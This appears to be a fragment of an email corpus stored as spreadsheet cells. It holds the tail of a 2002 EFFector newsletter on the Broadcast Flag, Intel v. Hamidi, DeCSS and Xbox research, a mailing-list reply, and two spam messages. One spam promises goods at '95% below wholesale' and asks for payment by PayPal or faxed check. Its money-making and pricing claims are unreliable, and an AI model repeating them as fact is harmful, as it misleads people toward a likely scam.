 those devices they believed would be successful in the market, often
 in spite of the misgivings of rights-holders. From the piano roll to
 the PVR, technologists have enjoyed the freedom to ship whatever
 products they believe the public will pay for; what's more,
 innovation has always thrived best where there were the fewest
 regulatory hurdles. NTSC tuners and devices are governed by precious
 few regulations, and consequently we see a rich field of products
 that interact with them, from the VCR Plus to tuner-cards for PCs to
 the PVR. The Broadcast Flag proposal would limit technologists to
 shipping those products that met with the approval of MPAA member
 companies. No entrepreneur or software author will know, a priori,
 whether his innovative DTV product will be legal in the market until
 he has gone to the expense of building it and taking it around to
 the Hollywood studios for review.
 Consumers and industry alike have benefitted greatly from the "Open
 Source" or "Free Software" movement, in which technologies are
 distributed in a form that encourages end-user modification. From
 server-software like the web-wide success-story apache, to operating
 systems like GNU/Linux, to consumer applications like the Mozilla
 browser, Free Software is a powerful force for innovation, consumer
 benefit and commercial activity. The BPDG proposal implicitly bans
 Free Software DTV applications -- such as the DScaler de-interlacer
 and the GNU Radio software-defined radio program -- as these
 applications are built to be modified by end-users, something that
 is banned under the BPDG proposal. The tamper-resistance component
 of the BPDG's "Robustness Requirements" will create and entire class
 of illegal software applications, abridging the traditional First
 Amendment freedom enjoyed by software authors who create expressive
 speech in code form under one of several Free Software/Open Source
 licenses.
 The BPDG nominally set out to create an objective standard, a bright
 line that technologists could hew to in order to avoid liability
 when deploying their products. However, the end product of the BPDG
 was a "standard" that contained no objective criteria for legal
 technology; rather, the standard required that new technologies be
 approved by MPAA member companies. Not uncoincidentally, the only
 technologies that were approved by the MPAA -- and hence the only
 legal technologies -- were those produced by the 4C and 5C
 consortia, a group of technology companies that acted as the MPAA's
 allies throughout the BPDG process. This is an harbinger of the sort
 of regime that the BPDG standard will usher in: technology companies
 will be able to shut their competitors out of the marketplace by
 allying themselves with Hollywood, brokering deals to allow certain
 technologies and outlaw others.
 The marketplace is a proven mechanism for rapidly and efficiently
 producing products that increase the value and desirability of new
 technologies, such as DTV. A BPDG mandate would subvert the market
 for DTV innovation. Competing companies with lower-cost DTV
 technology alternatives would be restrained from bringing these to
 market if they failed to assuage the MPAA's concerns about
 unauthorized redistribution. Furthermore, the universe of
 unauthorized-but-lawful uses for DTV programming will be shrunk down
 to the much smaller space of explicitly authorized uses. The ability
 of the public to make unauthorized-but-lawful uses of television
 programming has been an historical force for increasing the value of
 broadcast programming, from the VCR to the PVR.
 Ironically, the inevitable damage that a Broadcast Flag mandate
 would do to innovation, competition and consumer interests can only
 slow down DTV adoption, by driving up the cost of DTV devices while
 reducing the number of desirable features that an open market would
 create. If the public is offered less functionality for more money,
 they will not flock to DTV.
 The most disheartening thing about the Broadcast Flag is that there
 is neither a strong case that the Broadcast Flag is a necessary tool
 for protecting copyright, nor that the Broadcast Flag would be
 effective in that role. The existing practice of Internet
 infringement of broadcast programming -- analog captures from
 devices that satisfy the requirements of the BPDG proposal -- would
 not be stopped by the presence of a Broadcast Flag.
 Higher-resolution DTV signals will likewise present no challenge to
 determined infringers, who can capture full-quality analog signal
 from DTV devices and then re-digitize them, suffering only a single
 generation's worth of loss-of-quality before the programming enters
 the Internet.
 Meanwhile, the underlying rubric for a Broadcast Flag -- that
 infringement will undermine Hollywood's business to the point that
 movies will no longer be available to the public, reducing the value
 of DTV -- is no more than superstition. No credible study or
 analysis, undertaken by a neutral party, has ever been presented to
 Congress, the FCC, the CPTWG or the BPDG supporting this notion. The
 public is being asked to sacrifice its rights in copyright; industry
 is being asked to place its right to innovation in the hands of
 entertainers; the US government is being asked to mandate
 extraordinary, unprecedented regulation of the $600 billion
 technology sector -- all on the uncorroborated opinions of a few
 studio executives.
 EFF welcomes the FCC's oversight of the Broadcast Flag issue. The
 BPDG proceedings took place behind a shroud of secrecy, in a
 looking-glass "public process" where only those participants the
 organizers wanted to hear from were made privy to its existence,
 where the co-chairs invented rules and processes on the fly to suit
 the needs of the entertainment interests and the technology
 companies that had privately secured a promise of a legal monopoly
 for their products, where the press was banned.
 The FCC has an admirable tradition of seeking and weighing public
 opinion in its proceedings. As the FCC considers the Broadcast Flag,
 EFF hopes that it will start anew, setting aside the findings of the
 BPDG in light of the concerns raised by Microsoft, Philips, Sharp,
 Thomson, and Zenith, as well as non-profit organizations including
 EFF, Consumers Union, Consumer Federation of America, the Free
 Software Foundation, Public Knowledge, digitalconsumer.org, the
 Center for Democracy in Technology, and the Computer and
 Communications Industry Association.
 Thank you for attention in this matter. Please let me know if we can
 be of any further assistance to you.
 Sincerely yours,
 Cory Doctorow for the Electronic Frontier Foundation
 Links: 
 EFF's BPDG Blog: 
 http://bpdg.blogs.eff.org 
 An overview of our concerns with the broadcast flag:
 http://bpdg.blogs.eff.org/archives/one-page.pdf 
 Letter from Sen. Hollings: 
 http://bpdg.blogs.eff.org/archives/000155.html 
 Letter from Rep. Tauzin: 
 http://bpdg.blogs.eff.org/archives/000156.html
 --------------------------------------------------------------------
 * Update on Intel Corp. v. Hamidi
 Intel Corp. v. Hamidi is now on appeal to the California Supreme
 Court. EFF filed an amicus brief in support of Ken Hamidi on Aug. 6,
 2002. The facts are simple: Over about two years, Hamidi on six
 occasions sent e-mail critical of Intel's employment practices to
 between 8,000 and 35,000 Intel employees. Intel demanded that Hamidi
 stop, but he refused. Intel obtained an injunction barring Hamidi
 from e-mailing Intel employees at their Intel e-mail addresses,
 based on the common-law tort of "trespass to chattels." ("Chattel"
 is a legal term that refers to personal property, as opposed to
 property in land.)
 EFF's amicus brief argues three main points.
 (1) Intel did not qualify for relief under "trespass to chattels"
 because Intel's e-mail servers were not themselves harmed by
 Hamidi's e-mails. If Intel was harmed, it was because the content of
 Hamidi's e-mails affected Intel employees, not because sending the
 e-mails affected the functioning of Intel's servers.
 (2) By focusing on unwanted "contact" with the chattel and ignoring
 the harm requirement, the court of appeal turned "trespass to
 chattels" into a doctrine that threatens common Internet activity
 like search engines and linking. For example, if a website posted a
 "no trespassing" sign, any "contact" by a search engine could be
 considered a trespass even if it caused no harm.
 (3) The court of appeal wrongly held that the injunction did not
 infringe Hamidi's freedom of speech. The First Amendment limits
 private parties' legal remedies in many areas of law, such as libel,
 out of concern that private parties will use the law to suppress
 criticism. The same principle should apply here, where Intel's
 claims of harm stem from the meaning of Hamidi's speech.
 Links: 
 The Intel v. Hamidi Archive:
 http://www.eff.org/Cases/Intel_v_Hamidi/
 - end -
 --------------------------------------------------------------------
 * DeCSS Author Johansen's Trial Rescheduled
 The trial of Norwegian teen Jon Johansen, who created the
 controversial DeCSS software, has been pushed back again. It is now
 scheduled to be heard on December 9, 2002, in Oslo, Norway. In the
 fall of 1999, Johansen and his team reverse-engineered the content
 scrambling system (CSS) software used to encrypt DVDs in an effort
 to build a DVD player for the Linux operating system. In January of
 2002, the Norwegian Economic Crime Unit (OKOKRIM) charged Johansen
 with a violation of Norwegian Criminal Code Section 145.2, which
 outlaws breaking into a third-party's property in order to steal
 data that one is not entitled to. This prosecution marks the first
 time the law will be used to prosecute a person for accessing his
 own property (his own DVD). Johansen faces two years in prison if
 convicted. The prosecution is based on a formal complaint filed by
 the Motion Picture Association.
 The trial had originally been scheduled to take place in June of 
 2002 but was rescheduled when the court could not find any qualified 
 judges to hear Johansen's case.  Now the case is scheduled to be 
 heard by a three-judge panel. Help Jon in his battle against 
 Hollywood movie studios, donate to his legal defense fund at: 
 http://www.eff.org/support/jonfund.html
 Links: 
 The DeCSS/Johansen Archive:
 http://www.eff.org/IP/Video/DeCSS_prosecutions/Johansen_DeCSS_case/
 Digital Rights Management Archive: 
 http://www.eff.org/IP/DRM/
 - end -
 --------------------------------------------------------------------
 * Bunnie Presents Paper on XBox Reverse Engineering
 Paper Explains Flaw in Videogame Security System
 Researcher Escapes Chilling Effect of Digital Copyright Law
 Electronic Frontier Foundation Media Advisory
 For Immediate Release: Thursday, August 9, 2002
 San Francisco - The Electronic Frontier Foundation (EFF) is pleased
 to announce that former MIT doctoral student Andrew "Bunnie" Huang
 will present a paper explaining a security flaw in the Microsoft
 Xbox (TM) videogame system.
 Huang will present his paper, "Keeping Secrets in Hardware: the
 Microsoft X-BOX Case Study," at 5:25 p.m. PDT on August 13, 2002, at
 the 2002 Workshop on Cryptographic Hardware and Embedded Systems
 (CHES 2002) in Redwood City, California (Aug. 13-15, 2002).
 The Xbox security system is intended to allow people to play only
 videogames authorized by Microsoft. Huang's paper "shows how a
 person could defeat that system with a small hardware investment,"
 said MIT Professor Hal Abelson, one of Huang's advisors. "More
 importantly, the paper relates the security vulnerability to a
 general design flaw shared by other high-profile security systems
 such as the government's Clipper Chip and the movie industry's
 Contents Scrambling System (CSS) for DVD players."
 Huang contacted EFF in March after his advisors told him that his
 preliminary findings raised potentially significant legal questions.
 With the help of Boston College law professor Joe Liu, EFF worked
 with Huang, Abelson, and MIT administrators to analyze the legal
 issues and draft letters notifying Microsoft of Huang's research
 findings and intended publication, one of the steps encouraged by
 Digital Millennium Copyright Act (DMCA).
 Microsoft told Huang and Abelson that while it might prefer that the
 paper not be published, it would be inappropriate to ask MIT to
 withhold the paper.
 "Microsoft deserves praise for making no attempt to control
 publication," said Abelson. "Their response shows that they value
 academic freedom, and that they appreciate the critical role of
 unfettered research and publication in advancing technology."
 Other companies have reacted otherwise, using the DMCA to threaten
 researchers. The Recording Industry Association of America last year
 warned Princeton Professor Edward Felten after his research team
 exposed weaknesses in digital music security technologies. Last
 month, Hewlett Packard (HP) threatened research collective SnoSoft
 over exposing a security vulnerability in HP's Tru64 Unix operating
 system. Soon after, HP clarified that it would not use the DMCA to
 stifle research or impede the flow of information that would improve
 computer security.
 Huang said that while he is glad he can openly present his paper,
 "The DMCA clearly had a chilling effect on my work. I was afraid to
 submit my research for peer review until after the EFF's efforts to
 clear potential legal restraints."
 "Researchers should be analyzing security, not worrying about
 getting sued," said EFF Senior Staff Attorney Lee Tien.
 Links:
 For this release:
 http://www.eff.org/IP/DMCA/20020808_eff_bunnie_pr.html
 For Huang's paper:
 ftp://publications.ai.mit.edu/ai-publications/2002/AIM-2002-008.pdf
 For the CHES program: http://islab.oregonstate.edu/ches/program.html
 EFF "Unintended Consequences: Three Years Under the DMCA" report:
 http://www.eff.org/IP/DMCA/20020503_dmca_consequences.pdf
 RIAA sues Professor Edward Felten over SDMI:
 http://www.eff.org/Legal/Cases/Felten_v_RIAA/
 An article about Hewlett-Packard's threatening SnoSoft:
 http://www.wired.com/news/technology/0,1282,54297,00.html
 - end -
 --------------------------------------------------------------------
 * EFF Thanks Defcon
 EFF thanks The Dark Tangent and other organizers of the DEF CON X
 convention for their generous donation of exhibition space at DEF
 CON (http://www.defcon.org/). DEF CON is an "underground" computer
 security conference held each summer in Las Vegas.
 Links: 
 Defcon Website: 
 http://www.defcon.com/
 - end -
 --------------------------------------------------------------------
 * EFF Booth at LinuxWorld
 Come visit EFF at booth #488 at Linuxworld next week. We'll be
 passing out information, good cheer, and a slew of new stickers.
 When: August 13 - 15
 	10a - 5p
 Where: Booth #5
 	Moscone Center 
 	747 Howard Street
 	San Francisco, CA 94103
 Links: 
 LinuxWorld Conference Website: 
 http://www.linuxworldexpo.com/
 Floor Map and EFF Booth:
 http://www.linuxworldexpo.com/linuxworldexpo/v31/floorplan/floorplan
 .cvn?b=97&amp; exbID=50
 - end -
 --------------------------------------------------------------------
 Deep Links 
 Deep Links is a new department in the EFFector featuring noteworthy 
 news-items, victories and threats from around the Internet.
 * Baen Books expands fair-use-friendly e-book program
 Baen Books will bind a CD-ROM into the October 2002 hardcover
 edition of *War of Honor,* the latest volume in David Weber's epic
 Honor Harrington space-opera. The CD will contain at least 22
 complete novels, all in open formats like html and RTF, with the
 fair-use-friendly admonishment "This disk and its contents may be
 copied and shared but NOT sold." Included on the disk are the entire
 Honor Harrington series to date, as well as other titles from the
 Baen line, including Keith Laumer's *Retief!* and Larry Niven and
 Jerry Pournelle's *Fallen Angels*.
 Baen has been a banner-carrier for fair-use in electronic
 publishing, shipping text and html files that can be played on a
 multitude of devices. Other publishers have chosen to publish their
 material in copy-controlled formats that make it impossible to
 legally loan or resell the titles you purchase, are locked to a
 specific device, can't play on every operating system, and
 occasionally lock out assistive technology like the screen-readers
 employed by the blind.
 Dmitry Skylarov, a Russian scientist, was arrested in July 2001, for
 demonstrating how end-users could defeat the copy-prevention
 employed by Adobe's e-book technology. Adobe asked the FBI to arrest
 Skylarov for violating the Digital Millennium Copyright Act (DMCA),
 which makes it a crime to describe techniques for circumventing
 copy-prevention technology. Though Skylarov was later released, his
 employer, ElcomSoft, is still facing charges in the USA, and the
 Russian government has issued an advisory warning Russian scientists
 to steer clear of American technical conferences until the DMCA is
 repealed.
 Here is Baen's statement on the CD release:
 You are about to start playing with a CD-ROM that has fairly
 extraordinary content. As of this writing it includes twenty-two
 UNENCRYPTED novels in several formats, the ten Honor Harrington
 Novels, 3 Honor Harrington Anthologies and 9 novels by friends of
 Honor, and by the time of distribution it may well contain more.
 (More than twenty novels for free, and with no stupid codes to work
 around. Think of that.) The reason for the plethora of formats is to
 try to please the people who want to read the novels on their Palm
 Pilots or other text-specialized palm-sized devices.
 Links:
 Baen Books's page for *War of Honor*:
 http://www.baen.com/orientation.htm
 Slashdot discussion of *War of Honor* release:
 http://slashdot.org/article.pl?sid=02/08/03/2314232&amp;mode=flat&amp;tid=
 149
 EFF documents on Dmitry Skylarov and ElcomSoft:
 http://www.eff.org/IP/DMCA/US_v_Elcomsoft/
 EFF documents on the Digital Millennium Copyright Act (DMCA):
 http://www.eff.org/IP/DMCA/
 - end -
 * Singer/Songwriter Janis Ian on P2P Lucid article on the benefits of
 peer-to-peer networks form an artists' perspective.
 http://www.janisian.com/article-internet_debacle.html
 - end -
 * Hometown Paper Discusses Rep. Coble's Support of Berman P2P Hacking
 Bill Column on how a good Representative can make a bad call.
 http://www.news-record.com/news/columnists/staff/cone04.htm
 - end -
 --------------------------------------------------------------------
 Administrivia
 EFFector is published by:
 The Electronic Frontier Foundation 
 454 Shotwell Street 
 San Francisco
 CA 94110-1914 USA 
 +1 415 436 9333 (voice) 
 +1 415 436 9993 (fax) 
 http://www.eff.org/
 Editor: Ren Bucholz, 
 	Activist 
 	ren@eff.org
 To Join EFF online, or make an additional donation, go to: 
 http://www.eff.org/support/
 Membership &amp; donation queries: 
 membership@eff.org 
 General EFF, legal, policy or online resources queries: 
 ask@eff.org
 Reproduction of this publication in electronic media is encouraged.
 Signed articles do not necessarily represent the views of EFF. To
 reproduce signed articles individually, please contact the authors
 for their express permission. Press releases and EFF announcements &amp;
 articles may be reproduced individually at will.
 To change your address, plese visit:
 http://action.eff.org/subscribe/. 
 &gt;&gt;From there, you can update all your information. If you have already 
 subscribed to the EFF Action Center, please visit:
 http://action.eff.org/action/login.asp.
 (Please ask ren@eff.org to manually remove you from the list if this
 does not work for you for some reason.)
 Back issues are available at: 
 http://www.eff.org/effector
 To get the latest issue, send any message to
 effector-reflector@eff.org (or er@eff.org), and it will be mailed to
 you automatically. You can also get it via the Web at:
 http://www.eff.org/pub/EFF/Newsletters/EFFector/current. html
 ++++++++++++++++++++++++
 You received this message because qqqqqqqqqqs-eff@example.com is a member of 
 the mailing list originating from alerts@action.eff.org. To unsubscribe from 
 all mailing lists originating from alerts@action.eff.org, send an email to 
 alerts@action.eff.org with "Remove" as the only text in the subject line.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ~~ 80 to 95% BELOW WHOLESALE              28534
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 4.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;title&gt;New Page 1&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;div&gt;
   &lt;font size=3D"2"&gt;&lt;font color=3D"#ff0000" size=3D"5"&gt;&lt;/font&gt;&lt;i&gt;&lt;font face=
 =3D"Engravers MT" color=3D"#0000ff"&gt;
   &lt;h1 align=3D"center"&gt;BUY PRODUCTS&lt;/h1&gt;
   &lt;u&gt;
   &lt;h1 align=3D"center"&gt;70 to 80%&lt;/h1&gt;
   &lt;h1 align=3D"center"&gt;BELOW&lt;/u&gt; &lt;u&gt;WHOLESALE&lt;/h1&gt;
   &lt;/u&gt;
   &lt;h1 align=3D"center"&gt;NEW, AND IN QUANTITIES YOU NEED&lt;/h1&gt;
   &lt;h1 align=3D"center"&gt;A SINGLE UNIT, A PALLET,&lt;br&gt;
   OR A TRUCKLOAD&lt;/h1&gt;
   &lt;/font&gt;&lt;/i&gt;
   &lt;h3&gt;1. Do you consider yourself &amp;quot;FINANCIALLY SECURE&amp;quot;?&lt;/h3&gt;
   &lt;h3&gt;2. Are you still looking for a very Real Business that can provide y=
 ou and
   your family with the lifestyle you desire and deserve? &lt;i&gt;Or,just a seco=
 nd
   income in your spare time?&lt;/h3&gt;
   &lt;/i&gt;
   &lt;h3&gt;3. Would you invest $66.50 (A 25% discount off of our regular price =
 of
   $99.95 during this limited time promotion. ) in a business that could ma=
 ke you
   &amp;quot;FINANCIALLY SECURE&amp;quot;?&lt;/h3&gt;
   &lt;h3&gt;If so, read on:&lt;/h3&gt;
   &lt;h3&gt;This is not a get rich quick scheme, but, it is a way for you to get=
  into
   a business with a minimal investment and, may be your first step towards=
  a
   rewarding first, or second income. For the longest time, only those, who=
  were
   able to make large investments were able to take advantage of this type =
 of a
   business. We have made it possible for everyone to do it, and at a price
   everyone can afford.&lt;/h3&gt;
   &lt;b&gt;&lt;font size=3D"4"&gt;
   &lt;p&gt;&amp;nbsp;&lt;/p&gt;
   &lt;/font&gt;&lt;/b&gt;
   &lt;h3&gt;Corporate America has conditioned us to believe that security comes =
 from
   employment. Yet layoffs are hitting an all time high, major corporations=
  are
   failing and we hope to never become the victims of this downsizing, care=
 er
   burn out, illness or injury.&lt;/h3&gt;
   &lt;h3&gt;There was a time, when finding another job was not a problem, but to=
 day,
   the frightening reality for a lot of people is that &lt;font color=3D"#0000=
 ff"&gt;&amp;quot;the
   plastic in their wallets determines the quality of their lives.&amp;quot;&lt;/f=
 ont&gt;&lt;/h3&gt;
   &lt;h3&gt;The hard facts show that our economy has moved from the industrial a=
 ge
   into the INFORMATION, SERVICE AND RETAIL AGE. No longer can you depend o=
 n the
   corporation to provide your family with the security you seek.&lt;/h3&gt;
   &lt;h3&gt;If you are TIRED OF LIVING FROM PAYCHECK TO PAYCHECK, and are willin=
 g to
   work a few hours per week, than this may be for you.&lt;/h3&gt;
   &lt;h3&gt;Please read further:&lt;/h3&gt;
   &lt;h3&gt;We will show you how you can buy, new, not out of date, products for=
  &lt;font color=3D"#0000ff"&gt;PENNIES&lt;/font&gt;
   on the &lt;font color=3D"#0000ff"&gt;WHOLESALE DOLLAR&lt;/font&gt;. We will not just=
  send a
   list, or catalog of where you can buy, but actual point and click DATABA=
 SE
   with hyperlinks to suppliers=FFFFFF92 websites and specials pages, with =
 email
   addresses, phone and fax numbers, and their current &lt;font color=3D"#ff00=
 00"&gt;HOT&lt;/font&gt;
   listings. Unlike others=FFFFFF92 distribution businesses where you are p=
 rovided with
   WHOLESALE CATALOGS, out of date CD's, or lists of Government Auctions th=
 at
   sell Jeeps for $10, (which are a myth), we provide an unlimited virtual
   database of items at up to 95% below wholesale from liquidators, not
   wholesalers, that is up-dated on a weekly/daily basis by the suppliers. =
 And
   the products are available for immediate purchase and shipping to you.&lt;/=
 h3&gt;
   &lt;h3&gt;This database is designed for the individual or a small business. Al=
 though
   there are suppliers in this database selling in large quantities, most a=
 re
   selected for their flexability in being willing sell in small quantities=
  at
   great savings (80 to 95% Below Wholesale)&lt;/h3&gt;
   &lt;h3&gt;You will be able to buy such items as RCA Stereos that retail for $2=
 50.00+
   for $20.00, New Boom Boxes for $12.50 each, Palm Pilots for $39.00, Cell=
  Phone
   Antenna Boosters that sell on TV for $19.95- - for .16 cents, Perfect Pa=
 ncake
   makers as seen on TV for $19.95, for$6.50, Disney Kids' clothes at $1.85=
 /unit,
   or Pentium computers for as little as $11.00.&lt;/h3&gt;
   &lt;font size=3D"2"&gt;
   &lt;p&gt;&amp;nbsp;&lt;/p&gt;
   &lt;/font&gt;&lt;font color=3D"#ff0000"&gt;
   &lt;h3&gt;If you would like to see some sample listings and featured specials,
   please email us&lt;/font&gt;&lt;font color=3D"#0000ff"&gt; &lt;/font&gt;&lt;a href=3D"mailto:=
 adddata7080@excite.com"&gt;adddata7080@excite.com&lt;/a&gt;&lt;font color=3D"#0000ff"&gt;=
 &lt;/h3&gt;
   &lt;/font&gt;
   &lt;h3&gt;You may purchase this database:&lt;/h3&gt;
   &lt;b&gt;&lt;font size=3D"4"&gt;
   &lt;p&gt;By Credit Card: At PayPal to the account of &lt;/font&gt;&lt;/b&gt;&lt;font size=3D"=
 2"&gt;datapaid2000@yahoo.com&lt;/p&gt;
   &lt;/font&gt;
   &lt;h3&gt;By Phone with Credit Card at 502-741-8154&lt;/h3&gt;
   &lt;h3&gt;Check by Fax To:&lt;/h3&gt;
   &lt;h3&gt;Specialty Products 502-244-1373&lt;/h3&gt;
   &lt;font size=3D"4"&gt;
   &lt;p&gt;(Just write a check and fax it to the above number, NO NEED TO MAIL)&lt;=
 /p&gt;
   &lt;/font&gt;
   &lt;h3&gt;(Please include email address for the transmission of database.)&lt;/h3=
 &gt;
   &lt;b&gt;&lt;font size=3D"4"&gt;
   &lt;p&gt;By Mail:&lt;/p&gt;
   &lt;p&gt;Specialty Products&lt;/p&gt;
   &lt;p&gt;210 Dorshire Court&lt;/p&gt;
   &lt;p&gt;Louisville, KY 40245&lt;/p&gt;
   &lt;/font&gt;
   &lt;p&gt;(Please remember to include a valid email address for the transmissio=
 n of
   the Database)&lt;/p&gt;
   &lt;font size=3D"4"&gt;
   &lt;p&gt;&amp;nbsp;&lt;/p&gt;
   &lt;/font&gt;&lt;/b&gt;
   &lt;h3&gt;For your protection, we provide a&lt;font color=3D"#ff0000"&gt; &lt;u&gt;30 DAY,=
  100%
   MONEY BACK, SATISFACTION GUARANTEE&lt;/u&gt;&lt;/font&gt;, if we have misrepresented=
  our
   product.&lt;/h3&gt;
   &lt;h3&gt;What do you get for your&lt;font color=3D"#ff0000"&gt; $66.50 investment:&lt;=
 /font&gt;&lt;/h3&gt;
   &lt;h3&gt;A, fully executable, database of 100=FFFFFF92s of suppliers with hyp=
 erlinks to
   their websites, fax and phone numbers and a description of what type of
   product they handle and current product specials.&lt;/h3&gt;
   &lt;i&gt;&lt;font color=3D"#0000ff"&gt;
   &lt;h3&gt;And, &amp;quot;On-going telephone support during normal business hours.&amp;=
 quot;&lt;/h3&gt;
   &lt;/font&gt;&lt;/i&gt;&lt;font size=3D"2"&gt;
   &lt;p&gt;&amp;nbsp;&lt;/p&gt;
   &lt;/font&gt;
   &lt;h3&gt;Since this is such a fast changing business, with new products being=
  added
   and deleted on a weekly or even a daily basis, all data will be provided
   within 24 hours of receipt of payment via email file transfer. ( no wait=
 ing or
   shipping and handling costs) The &lt;font color=3D"#0000ff"&gt;$66.50&lt;/font&gt; i=
 s your &lt;i&gt;&lt;u&gt;&lt;font color=3D"#0000ff"&gt;total&lt;/font&gt;&lt;/u&gt;&lt;/i&gt;
   one time &lt;font color=3D"#0000ff"&gt;cost&lt;/font&gt;.&lt;/h3&gt;
   &lt;h3&gt;This DATABASE is for individuals who recognize an opportunity to mak=
 e a
   substantial income. Keep in mind, everyone likes a bargain, and even mor=
 e so
   when the economy is down. So, even if you just want to buy for your own =
 use, a
   single purchase could repay your initial investment. And, remember we pr=
 ovide
   a &lt;u&gt;&lt;font color=3D"#ff0000"&gt;30day, full refund satisfaction guarantee.&lt;=
 /font&gt;&lt;/u&gt;&lt;/h3&gt;
   &lt;h3&gt;We know that this has been a brief description, and you may want
   additional information. You may email us at &lt;a href=3D"mailto:adddata708=
 0@excite.com"&gt;adddata7080@excite.com&lt;/a&gt;
   for additional information and a sample of listings currently being offe=
 red by
   various suppliers. &lt;font color=3D"#ff0000"&gt;(If you give us some idea of =
 what
   types of products interest you, we will try to include some sample listi=
 ngs of
   those products.)&lt;/h3&gt;
   &lt;/font&gt;
   &lt;h3&gt;We look forward to being of service in your new venture.&lt;/h3&gt;
   &lt;p&gt;&lt;font size=3D"4"&gt;&lt;strong&gt;Specialty Products&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;
   &lt;/font&gt;
 &lt;/div&gt;
 &lt;p&gt;&lt;a href=3D"mailto:quitit2001@flashmail.com?Subject=3Dgone"&gt;takeoffemail=
 databaseclickhere&lt;/a&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "O" == Owen Byrne &lt;owen@permafrost.net&gt; writes:
     O&gt; Well, IMNHO, its because companies do not reward knowledge
     O&gt; sharers. When time comes for evaluation, there isn't a line on
     O&gt; the page saying "Helped others to succeed with their projects."
 And yet, in my experience, it still happens, but always "unofficially"
 and "off the record".  It's as if we believe that "the gods" will
 punish us if we are seen to have behaved in a human fashion while on
 company time, either by being caught red-handed, or having the
 paper-trail finger us later.  Yet even CEOs will "pull strings" to
 make things happen, and, also in my experience, those are the moments
 when things actually do happen.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Brand New Premium Promotion
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_hzG8dMSOY9olT2Ty
 Content-Type: multipart/alternative;
 	boundary="----=_NextPart_hzG8dMSOY9olT2TyAA"
 ------=_NextPart_hzG8dMSOY9olT2TyAA
 Content-Type: text/plain;
 Content-Transfer-Encoding: quoted-printable
 ------=_NextPart_hzG8dMSOY9olT2TyAA--
 ------=_NextPart_hzG8dMSOY9olT2Ty
 Content-Type: application/octet-stream;
 	name="C:\WINDOWS\Desktop\Brand New Premium.htm"
 Content-Transfer-Encoding: base64
 Content-Disposition: attachment;
 	filename="Brand New Premium.htm"
 PE1FVEEgSFRUUC1FUVVJVj0iQ29udGVudC1UeXBlIiBDT05URU5UPSJ0ZXh0L2h0bWw7Y2hhcnNl
 dD1pc28tODg1OS0xIj4NCjwhRE9DVFlQRSBIVE1MIFBVQkxJQyAiLS8vVzNDLy9EVEQgSFRNTCA0
 LjAgVHJhbnNpdGlvbmFsLy9FTiI+DQo8SFRNTCB4bWxuczprbT48SEVBRD48VElUTEU+S2lGdW5n
 IGVOZXdzPC9USVRMRT4NCjxNRVRBIGh0dHAtZXF1aXY9Q29udGVudC1UeXBlIGNvbnRlbnQ9InRl
 eHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4NCjxNRVRBIGNvbnRlbnQ9Ik1TSFRNTCA2LjAw
 LjI2MDAuMCIgbmFtZT1HRU5FUkFUT1I+PC9IRUFEPg0KPEJPRFkgYmdDb2xvcj0jZmZmZmZmIHRv
 cE1hcmdpbj0xMCANCm9ubG9hZD0iTU1fcHJlbG9hZEltYWdlcygnaW1hZ2VzL21vcmVfby5naWYn
 KSI+DQo8RElWPjxGT05UIGZhY2U9TWluZ0xpdSBzaXplPTI+PC9GT05UPiZuYnNwOzwvRElWPg0K
 PERJVj48Rk9OVCBmYWNlPU1pbmdMaXUgc2l6ZT0yPjwvRk9OVD48QlI+PC9ESVY+DQo8RElWPjxC
 PkZyb206PC9CPiA8QSB0aXRsZT1pbmZvQGtpZnVuZ2FkLmNvbSBocmVmPSJtYWlsdG86aW5mb0Br
 aWZ1bmdhZC5jb20iPktpIA0KRnVuZyBBZHZlcnRpc2luZyBDby4sIEx0ZDwvQT4gPC9ESVY+DQo8
 RElWIHN0eWxlPSJGT05UOiAxMHB0ICYjMjYwMzI7JiMzMjA0ODsmIzI2MTI2OyYjMzk2MzY7Ij4N
 CjxESVY+PEI+PC9CPiZuYnNwOzwvRElWPg0KPERJVj48Qj5TdWJqZWN0OjwvQj4gQnJhbmQgTmV3
 IFByZW1pdW0gUHJvbW90aW9uPC9ESVY+PC9ESVY+DQo8RElWPjxCUj48L0RJVj5EZWFyIFNpci8g
 TWFkYW0sPEJSPjxCUj5XZSBoYXZlIHByb21vdGlvbiBpdGVtIGRvd24gdG8gSEskMSAhISEgDQpB
 cyBvbmUgb2YgdGhlIG1vc3QgcHJvZmVzc2lvbmFsIGdpZnQgYW5kIHByZW1pdW0gY29sbGVjdGlv
 biBjb21wYW5pZXMgaW4gSG9uZyANCktvbmcsIHdlIGFyZSBub3cgc2VuZGluZyB5b3Ugb3VyIGxh
 dGVzdCBjb2xsZWN0aW9uIG9mIHByZW1pdW1zLiBXZSB0YWlsb3IgbWFkZSANCnByZW1pdW1zIGZv
 ciBib3RoIG91ciBsb2NhbCBhbmQgb3ZlcnNlYXMgY3VzdG9tZXJzLCBwcm92aWRpbmcgY29tcHJl
 aGVuc2l2ZSANCnNwcG9ydCB0byBlbnN1cmUgdGhlIEJFU1QgUVVBTElUWSwgQUNDVVJBVEUgRGVs
 aXZlcnkgZGF0ZSBhcyB3ZWxsIGFzIHRoZSBMT1dFU1QgDQpQUklDRSEgUGxlYXNlIHZpc2l0IG91
 ciB3ZWIgc2l0ZSBhcyB3ZWxsLiBFbmpveSB5b3Vyc2VsZiB3aXRoIEtpIEZ1bmcuPEJSPjxCUj5L
 aSANCkZ1bmcgTWFya2V0aW5nJm5ic3A7IA0KPFNUWUxFIHR5cGU9dGV4dC9jc3M+Lm5hbWUgew0K
